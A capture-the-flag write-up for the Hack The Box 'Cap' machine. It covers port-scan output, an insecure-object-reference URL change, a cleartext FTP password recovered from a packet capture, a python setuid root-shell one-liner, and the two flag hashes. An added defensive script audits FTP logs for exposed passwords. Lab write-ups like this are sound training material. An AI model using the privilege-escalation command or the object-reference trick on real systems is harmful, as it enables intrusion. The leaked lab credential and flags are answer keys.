Hackthebox-Cap

https://www.hackthebox.eu/home/machines/profile/351

10.10.10.245

21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
| 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open http gunicorn

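Web vulnerability

Horizontal privilege escalation
Change the parameter from 2 to 0
http://10.10.10.245/data/0
Download the pcap file and analyze it in Wireshark; the FTP username and password are transmitted in cleartext.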

220 (vsFTPd 3.0.3)
USER nathan
331 Please specify the password.
PASS Buck3tH4TF0RM3!
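
Added example (not part of the original write-up): a Python check that scans an FTP control-channel transcript, such as the stream followed in Wireshark above, and reports accounts whose password was sent before TLS was negotiated, without storing the password. The function name audit_ftp_control and the sample transcript are constructed for illustration.

```python
import re

# Constructed control-channel transcript in the same shape as the capture
# above; the account name and password are placeholders, not real values.
SAMPLE = """220 (vsFTPd 3.0.3)
USER anonymous
331 Please specify the password.
PASS guest@example.com
530 Login incorrect.
USER alice
331 Please specify the password.
PASS example-password
230 Login successful.
"""

COMMAND = re.compile(r"^(USER|PASS|AUTH)\s+(.*)$", re.IGNORECASE)
REPLY = re.compile(r"^(\d{3})[ -]")
ANONYMOUS = {"anonymous", "ftp"}


def audit_ftp_control(text):
    """Return one finding per password sent before TLS was negotiated."""
    findings, user, last_cmd, tls, open_finding = [], None, None, False, None
    for line in (raw.strip() for raw in text.splitlines()):
        reply = REPLY.match(line)
        if reply:
            code = reply.group(1)
            if last_cmd == "AUTH" and code == "234":  # server accepted AUTH TLS
                tls = True
            if last_cmd == "PASS" and open_finding is not None:
                open_finding["accepted"] = code == "230"  # login succeeded
                open_finding = None
            last_cmd = None
            continue
        cmd = COMMAND.match(line)
        if not cmd:
            continue
        last_cmd, arg = cmd.group(1).upper(), cmd.group(2)
        if last_cmd == "USER":
            user = arg
        elif last_cmd == "PASS" and not tls and (user or "").lower() not in ANONYMOUS:
            # Record the exposure only; the secret itself is never stored.
            open_finding = {"user": user, "accepted": None}
            findings.append(open_finding)
    return findings


if __name__ == "__main__":
    print(audit_ftp_control(SAMPLE))
```

A finding with accepted set to True marks a credential that was both exposed and valid, so it should be rotated and the service moved to FTPS or SFTP.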

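Privilege escalation

There is an app.py under /var/www/html

Analysis of the source code shows that Python can invoke Wireshark to capture packets, which indicates that it has root privileges

Run the following command to obtain root privileges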

python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

8dba53a3ef6f8529f184b8a6fe7a26a7
0f7d93636beea8fae21c5fcba7390eef

References

https://gtfobins.github.io/gtfobins/python/#suid